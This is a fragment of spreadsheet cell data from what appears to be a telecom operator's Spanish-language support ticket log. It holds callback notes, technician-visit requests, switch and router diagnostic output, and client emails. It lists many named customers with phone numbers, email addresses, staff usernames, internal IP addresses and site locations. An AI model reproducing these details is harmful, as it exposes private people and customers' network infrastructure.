SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 09:44:40</t>
  </si>
  <si>
    <t>CLIENTE COMENTA QUE APLICO RESET Y SERVICIO RESTABLECIO ##VIVO
1001815022
COLA:
NOMBRE: A: 0050370719975
NÚMERO: 0050370719975
DURACIÓN: 0:03:10
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050370719975
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 09:48:20
&lt;NTSTP:SNT=VET-1869;
SWITCHING NETWORK TERMINAL STATE
SNT                STATE       BLS   LST              FCODE
VET-1869           WO
END
&lt;NTCOP:SNT=VET-1869;
SWITCHING NETWORK TERMINAL CONNECTION DATA
SNT           SNTV  DEV                       EXTP               MG
VET-1869          1 LIPRVGS-12096&amp;&amp;-12127     SR1/17/2/43        ALTMG01
              DIP
              1869PRG
END
&lt;NTSTP:SNT=VET-1869;
SWITCHING NETWORK TERMINAL STATE
SNT                STATE       BLS   LST              FCODE
VET-1869           WO
END
&lt;STDEP:DEV=LIPRVGS-12097&amp;&amp;-12127;
DEVICE STATE DETAILS
DEV             STATE BLS  FTYPE  ADM  ABS   SNB           SNBST  LIST
LIPRVGS-12097   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12098   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12099   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12100   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12101   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12102   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12103   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12104   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12105   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12106   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12107   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12108   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12109   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12110   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12111   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12112   BLOC  MBL         NC   H'80
LIPRVGS-12113   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12114   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12115   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12116   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12117   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12118   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12119   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12120   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12121   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12122   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12123   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12124   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12125   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12126   IDLE                   H'0   25936100      IDLE   YES
LIPRVGS-12127   IDLE                   H'0   25936100      IDLE   YES
END
&lt;STDEP:DEV=LIPRVGS-12097&amp;&amp;-12127;
DEVICE STATE DETAILS
DEV             STATE BLS  FTYPE  ADM  ABS   SNB           SNBST  LIST
LIPRVGS-12097   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12098   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12099   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12100   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12101   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12102   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12103   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12104   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12105   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12106   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12107   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12108   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12109   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12110   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12111   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12112   BLOC  MBL         NC   H'80
LIPRVGS-12113   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12114   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12115   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12116   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12117   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12118   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12119   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12120   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12121   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12122   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12123   BUSY                   H'0   25936100      BUSY   YES
LIPRVGS-12124   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12125   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12126   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12127   IDLE                   H'0   25936100      BUSY   YES
END
&lt;STDEP:DEV=LIPRVGS-12097&amp;&amp;-12127;
DEVICE STATE DETAILS
DEV             STATE BLS  FTYPE  ADM  ABS   SNB           SNBST  LIST
LIPRVGS-12097   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12098   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12099   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12100   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12101   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12102   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12103   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12104   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12105   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12106   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12107   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12108   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12109   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12110   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12111   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12112   BLOC  MBL         NC   H'80
LIPRVGS-12113   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12114   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12115   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12116   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12117   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12118   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12119   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12120   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12121   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12122   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12123   BUSY                   H'0   25936100      BUSY   YES
LIPRVGS-12124   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12125   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12126   IDLE                   H'0   25936100      BUSY   YES
LIPRVGS-12127   IDLE                   H'0   25936100      BUSY   YES
END
&lt;
TIME OUT
DATOS UBICADOS:
DATOS:
DDF CX ALTAMIRA: 29-2-11.
OP 108</t>
  </si>
  <si>
    <t>F4612609</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIO SOSA AL 51276289 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001707120
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIO SOSA AL 51276289 SOLICITA QUE SE LE LLAME AL SEÑOR
SERGIO CAAL AL 56151460 **
-ID 1001728440 -
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SERGIO CAAL AL 56151460 INDICA QUE NO ENTIENDE EL CORREO QUE SE LE ENVIO YA QUE QUIERE SABER EL PORQUE LOS ELISTARON EN BLACKLIST, Y QUE ELLOS NO ENVIAN CORREOS SPAM Y NO ENTIENDE QUE ES LO QUE DEBE DE VERIFICAR SI SU RED INTERNA  ESTA BIEN SOLICITA QUE SE LE CONTACTE DIRECTAMENTE A EL Y QUE SE LE ENVIE INFORMACION A SU CORREO QUE ES SERGIO.CAAL@IDELOA.COM || SE NOTIFICA A GESTOR **
-ID 1001729998
**</t>
  </si>
  <si>
    <t>F4612616</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE JIMENEZ AL 47409035 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001708714
**</t>
  </si>
  <si>
    <t>F4612627</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MOISES MARROQUIN AL 25562794 - 77979513 NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001709987 - 1001700267
**</t>
  </si>
  <si>
    <t>SE ENVIA  CORRE
GESTIÓN DE APERTURA F4612627 |IP2383069SV | GASOLINERA SAN ANDRES SAN JUAN OPICO (ATM)|
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV
CC:CNOCCA;GRUPO N1
JUE 23/06/2022 8:14
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR APERTURA DE CAJERO A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
 F4612627 |IP2383069SV | GASOLINERA SAN ANDRES SAN JUAN OPICO (ATM)|
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA DE ACUERDO A SU OPERACIÓN PARA PODER REALIZAR COORDINACIÓN
TÉCNICOS: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EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MOISES MARROQUIN 25562794 MENCIONA QUE YA NO ESTA DE TURNO POR LO QUE BRINDA OTRO CONTACTO 77979574
-ID 100473904</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77979574 MENCIONA QUE YA APLICARON LAS PRUEBAS DE PRIMER NIVEL
CLIENTE ESTA SOLICITANDO VISITA TECNICA
-ID 1001744447
NOMBRE DEL CLIENTE: BANCO DAVIVIENDA SALVADOREÑO S.A.
UBICACIÓN:GASOLINERA SAN ANDRES SAN JUAN OPICO (ATM)
GESTIÓN DE PERMISOS: ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV</t>
  </si>
  <si>
    <t>F4612628</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN BAUTISTA 76079531 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA PARA MAÑANA A LAS 12:00 HRS
-ID 1001746258</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A COMERCIAL-
ID1141024 /ALCALDIA MUNICIPAL ILOBASCO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN BAUTISTA 76079531  MENCIONA QUE EL SERVICIO YA RESTABLECIO PERO INDICA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO
CLIENTE MENCIONA QUE TIENEN CONTRATADO 100MBPS
-ID 1001874949</t>
  </si>
  <si>
    <t>F4612632</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE FEDE BARRIENTOS AL 79305020 INDICA QUE AUN NO CUENTA CON SERVICIO || SE NOTIFICA A GESTOR **
-ID 1001712328
**</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A FEDE BARRIENTOS/CLIENTE PARA QUE EXPONGA DETALLES DE LO REPORTADO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA ALEJANDRO NAVARRO/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4612633</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MANFIEL GODINEZ PERO ENVIA A BUZON.
1001728479
COLA:
NOMBRE: A: 54293332
NÚMERO: 54293332
DURACIÓN: 0:00:06
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 54293332
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 16:32:45</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA AL CLIENTE MANFIELD GODINEZ QUIEN ESTA APOYANDO A REVISAR LOS EQUIPOS.
INDICA QUE LA LUZ DE SYNC NO ENCIENDE Y EL  ALM ESTA EN ROJO. SE APLICO RESET PERO NO HAY CAMBIOS.
CLIENTE SOLICITA VISITA TECNICA. INDICA QUE NO SE REQUIEREN PERMISOS DE ACCESO Y QUE SE LE INFORME PARA EL PARQUEO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANFIEL GODINEZ 54293332, SOLICITA SE LE LLAME EN 20 MINUTOS YA QUE NO HA LLEGADO A LAS INSTALACIONES. ID: 1001790050</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MANFIEL GODINEZ 54293332 CONFIRMA SERVICIO ESTABLE Y OPERATIVO*
-ID 1001853741
**</t>
  </si>
  <si>
    <t>F4612652</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE SR. VILLEDA AL 31808554 CLIENTE INDICA QUE AUN NO TIENE SERVICIO || SE NOTIFICA A GESTOR **
-ID 1001719759
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. VILLEDA AL 31808554 SE INTENTA NUEVAMENTE ENVIA DIRECTO A BUZON || A ESPERA QUE CL BRINDE OTRO CONTACTO **
-ID 1001849185
**</t>
  </si>
  <si>
    <t>F4612654</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA GARCIA 22130200  PERO NO RESPONDE
-ID 1001746907</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA GARCIA 22130200 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001720631</t>
  </si>
  <si>
    <t>F4612662</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 IVR INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS
-ID 1001752496</t>
  </si>
  <si>
    <t>F4612673</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS SARMIENTO 31853108 QUIEN APOYA APLICANDO REINICIO PERO EL INCONVENIENTE PERSISTE
-ID 1001714424
NOMBRE DEL CLIENTE: ORDEN HOSPITALARIA DE SAN JUAN DE DIOS
UBICACIÓN:RESIDENCIAL PALOS VERDES 37 CALLE 8 AVE SUR 800 MTS ADENTRO DEL INFOP
CONTACTO EN SITIO: CARLOS SARMIENTO - 31853108
HORARIO DE ATENCION:7:00 - 17:00
GESTIÓN DE PERMISOS: GERENCIAOH@HSJDDHN.COM DATOS DE PERSONAL TECNICO</t>
  </si>
  <si>
    <t>F4612701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JASON BRAN 32922282  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001730753</t>
  </si>
  <si>
    <t>F4612728</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ELDER BELTETON 59540201, SOLICITA SE LE LLAME EN 10 MINUTOS EN LO QUE SE DIRIGE A DONDE ESTÁN LOS EQUIPOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE ELDER BELTETON 59540201 APOYA REINICIANDO EQUIPO AETHRA Y SE CORRIGE REGISTRO, CLIENTE REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES. VALID QUE TIENE LLAMADAS EN AMBOS SENTIDOS, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO
INDUSTRIAS_KERNS_288900010\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        75       76
DSP                   :         8        8
DSP MODULE            :        29       30
CURRENT TRUNK SIP CONNECTIONS = 1 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST                              REFRESH   REG.TIME
SIP-KERNS             ENABLE   +50223237000                     REGISTERED                              10.16.246.231:5060                             2399      09 APR 1970 09:08:42
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE
LOGICAL STATUS       : USED INTO INBOUNDLIST,OUTBOUNDLIST
B1 CHAN. CALL STATUS : INCOMING RINGING
DSP MEDIA            : CLOSED
B CHANNELS IN USE: 1
  NOW AVAILABLE FOR INCOMING CALLS: 2-15,17-31
  NOW AVAILABLE FOR OUTGOING CALLS: 2-15,17-31</t>
  </si>
  <si>
    <t>F4612734</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE VICTOR TECUN 1755 EXT 60011 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001911152 - 1001912745</t>
  </si>
  <si>
    <t>F4612737</t>
  </si>
  <si>
    <t>F4612738</t>
  </si>
  <si>
    <t>F4612739</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS AREVALO AL 70399066  NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001778579
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS AREVALO AL 70399066   NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001792484
**</t>
  </si>
  <si>
    <t>F4612743</t>
  </si>
  <si>
    <t>F4612744</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ADAN AL 85776126 CONTESTA EL SEÑOR SERGIO BALTODANO CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001997262
**</t>
  </si>
  <si>
    <t>F4612748</t>
  </si>
  <si>
    <t>SE TERMINA LLAMDA CON EL CLIENTE, QUIEN ME INDICA QUE SE REALIZARA EL CAMBIO DE UPS, YA SE PLATICO CON EL PROVEERDOR Y SE TIENE UN ETIMADO DE UN MES PARA QUE SE HAGA EL CAMBIO DE UPS
2001483053
COLA:
NOMBRE: A: 42176633
NÚMERO: 42176633
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42176633
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 27/06/2022 11:09:10</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE DEL PR  LUIS VAQUEZ QUIEN COMENTA  QUE EL  CAMBIO DE UPS APROXIMADAMENTE LO HARAN A FINALES DE AGOSTO YA QUE TIENEN QUE VER EL PROCESO DE COMPRA Y INSTALACION DEL MISMO,  SE ADJUNTA IMAGEN DE LA LLAMADA.</t>
  </si>
  <si>
    <t>SE LLAMA A MIGUEL VASQUEZ QUIEN INDICA QUE SI HAN TENIDO BASTANTES PROBLEMAS CON LA ENERGÍA ELECTRICA, INDICA QUE SI TIENEN UPS CONECTADOS, MENCIONA QUE LLAMARA A PERSONAL TECNICO PARA VERIFICAR SI LOS UPS ESTAN FUNCIONANDO CORRECTAMENTE, POR LO QUE SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 9:30 AM PARA RETROALIMENTACION DEL ESTADO DE LOS EQUIPOS
1001887740
COLA:
NOMBRE: A: 42176633
NÚMERO: 42176633
DURACIÓN: 0:03:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42176633
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 23/06/2022 13:12:40</t>
  </si>
  <si>
    <t>SE LLAMA A MIGUEL 42176633 PARA VALIDAR AVANCES CON RESPECTO A LA REVISION DEL UPS, SIN EMBARGO NO SE LOGRA COMUNICACION, ACTUALMENTE SERVICIO OPERATIVO POR MAS DE 2 DIAS.
ID
2001265285
COLA:
NOMBRE: A: 42176633
NÚMERO: 42176633
DURACIÓN: 0:00:47
ESTADO: CONECTADA
DETALLES: 42176633
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/06/2022 12:33:27
NODE STATUS	REACHABLE
SYSTEM NAME	CC_UNICOMER_GT_PATULUL
IP ADDRESS	10.212.102.115
COUNTRY	GUATEMALA
PROPERTY	CUSTOMER
GROUP	CC_UNICOMER_VIP
CUSTOMER	OPMANTEK
LOCATION	ESCUINTLA
BUSINESS SERVICE	
SERVICE STATUS	DEVELOPMENT
TYPE	ROUTER
MODEL	CISCOROUTER
UPTIME	2 DAYS, 20:11:15
LOCATION	PRINCIPAL_3 AVENIDA 3-69 ZONA 1 PATULUL SUCHITEPEQUEZ
CONTACT	DEFAULT
DESCRIPTION	CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M5, RELEASE SOFTWARE (FC2) TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT COPYRIGHT (C) 1986-2013 BY CISCO SYSTEMS, INC. COMPILED FRI 13-SEP-13 13:51 BY PROD_REL_TEAM
INTERFACES	14
LAST UPDATE	25-JUN-2022 12:30:19
VENDOR	CISCO SYSTEMS
OBJECT NAME	CISCO1941
ROLE	CPE_R
NET	LAN
POLLING_POLICY	DEFAULT
BOOT CONFIGURATION LAST CHANGED	0:00:00
CHASSIS VERSION	1.0
CONFIGURATION LAST CHANGED	0:00:33
CONFIGURATION LAST VIEWED	20:54:23
COMMAND PING FOR NODE CC_UNICOMER_GT_PATULUL (10.212.102.115)
PING 10.212.102.115 (10.212.102.115) 56(84) BYTES OF DATA.
64 BYTES FROM 10.212.102.115: ICMP_SEQ=1 TTL=252 TIME=2.45 MS
64 BYTES FROM 10.212.102.115: ICMP_SEQ=2 TTL=252 TIME=2.58 MS
64 BYTES FROM 10.212.102.115: ICMP_SEQ=3 TTL=252 TIME=2.57 MS
--- 10.212.102.115 PING STATISTICS ---
3 PACKETS TRANSMITTED, 3 RECEIVED, 0% PACKET LOSS, TIME 2006MS
RTT MIN/AVG/MAX/MDEV = 2.450/2.537/2.588/0.074 MS</t>
  </si>
  <si>
    <t>SE HABLA CON MIGUEL 42176633 , INDICA QUE VAN A CAMBIAR EL UPS, QUE LOS EQUIPOS DE CLARO SI ESTAN PROTEGIDOS PERO EL PROBLEMA ERA QUE ESTABA CONFIGURADO EN MODO BYPASS, SE SOLICITA APOYO INDICANDO SI TIENEN UNA FECHA PROGRAMADA PARA CAMBIARLO, SOLICITA QUE SE LLAME EL DIA LUNES YA QUE LA PERSONA QUE TIENE EL DATO NO LABORA EL FIN DE SEMANA, SE PROCEDERA PARA QUE BRINDE EL DATO EL LUNES Y TENERLO DOCUMENTADO.
ID
2001297388
COLA:
NOMBRE: A: 42176633
NÚMERO: 42176633
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42176633
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/06/2022 15:34:02</t>
  </si>
  <si>
    <t>F4612768</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEIDY SICAN  47622581 MENCIONA QUE ESTE SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE TIENTE PROBLEMA DESDE AYER CON EL ID 351500001T CAIDA TOTAL
-ID 1001748289</t>
  </si>
  <si>
    <t>F4612772</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KELVIN MARTINEZ 77479205 - 22399723 QUIEN SOLICITA VISITA PARA MAÑANA A LAS 8:30
-ID 1001753080 - 1001753402</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 14:49
PARA: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; BANCAELECTRONICA@FEDECREDITO.COM.SV &lt;BANCAELECTRONICA@FEDECREDITO.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || FEDERACION DE CAJAS DE CREDITO || IP2037249SV || SAN SALVADORCOL. SAN LUISPLAZA COMERCIAL SAN LUISCLL.ANTIGUA A SAN ANTONIO ABAD
BUENAS TARDES APRECIABLE CLIENTE
GUSTO DE SALUDARLE, LE COMENTAMOS QUE EL DÍA DE HOY SE EJECUTO VISITA TÉCNICA, NUESTRO TÉCNICO RONALD CRESPIN INFORMA QUE LA CAJA TERMINAL ES
INTERNA EN EL COMERCIAL SUPER SELECTO Y HACE POCO LLEGARON A REALIZAR MANTENIMIENTO Y ROMPIERON LA ACOMETIDA HACIA AL CAJERO.
SOLICITAMOS DE SU APOYO LA COORDINACIÓN CON SUPER SELECTO LA REPARACIÓN DE LA ACOMETIDA INTERNA.
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;</t>
  </si>
  <si>
    <t>F4612773</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL MENDOZA 45774019 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001882279</t>
  </si>
  <si>
    <t>SE LLAMA A CLINTE  MIGUEL MENDOZA 45774019 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001889205</t>
  </si>
  <si>
    <t>F4612781</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE INDICA QUE NO PUEDE VALIDAR PERO SOLICITA LLAMADA MAÑANA A LAS 9:00 AM PARA VALIDAR YA QUE PERSONAL EN SITIO YA SE RETIRO-</t>
  </si>
  <si>
    <t>F4612805</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PARTE DEL CLIENTE JOSUE SOLICITANDO AVANCES ID: 1001764788
CLIENTE CONFIRMA SERVICIO OPERATIVO, SOLICITA MONITOREO HASTA EL DIA DE ,MAÑANA 23/06 A LAS 15:00 HRS, SE NOTIFICA A MIGUELAN.RODRIGUEZ VIA SKYPE PARA EL MOVIMIENTO DE ETAPA | WIP</t>
  </si>
  <si>
    <t>SE LLAM A ACLIENTE JOSUE PEREZ 33937597 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001932318</t>
  </si>
  <si>
    <t>F4612822</t>
  </si>
  <si>
    <t>SE LLAMA A ASTRID PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE
58423542</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ASTRID SAZO 58423542 MENCIONA QUE PERSONAL TECNICO DE CLARO SE ENCUENTRA EN PR
-ID 1001857962</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ASTRID SAZO NÚMERO: 58423542  , QUIEN INDICA QUE SE PUEDE PROCEDER CON EL CIERRE DEL INCIDENTE
1001864901
COLA:
NOMBRE: A: 58423542
NÚMERO: 58423542
DURACIÓN: 0:01:05
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58423542
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: DIONICIO.VELIZ
FECHA Y HORA LOCALES: 23/06/2022 12:02:27</t>
  </si>
  <si>
    <t>**SE LLAMA AL NÚMERO ASTRID SAZO 58423542 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON GESTOR **
-ID 1001790443
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL NÚMERO ASTRID SAZO 58423542 SOLICITA QUE SE LE LLAME EN 15 MIN **
-ID 1001779445
**</t>
  </si>
  <si>
    <t>F4612849</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BLADIMIR DURAN  70714213 - 70714277 PARA SOLICITAR LOS DATOS DE VISITA PERO INDICA QUE LOS ENVIARA POR CORREO, SE LE SOLICITA PUEDA COLOCAR EN EL ASUNTO EL NOMBRE DE LA EMPRESA Y EL ID
SE SOLCITA A CLIENTE LA SIGUIENTE INFORMACION:
UBICACIÓN:
CONTACTO EN SITIO: 	
HORARIO DE ATENCION:
GESTIÓN DE PERMISOS:
-ID 1001754750 - 1001755001</t>
  </si>
  <si>
    <t>F4612850</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CIENTE SOLICITANDO ACCESOS PARA VIERNES 22/06 SEGUN SOLICITADO POR CLIENTE || PENDIENTE CONFIRMACIÓN
ASUNTO: VISITA TÉCNICA ID: 349400066T || DOLLARCITY GUATEMALA S.A. || 19 AV. 2-40 Z.3 QUETZALTENANGO C.C. UTZULEW MALL
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
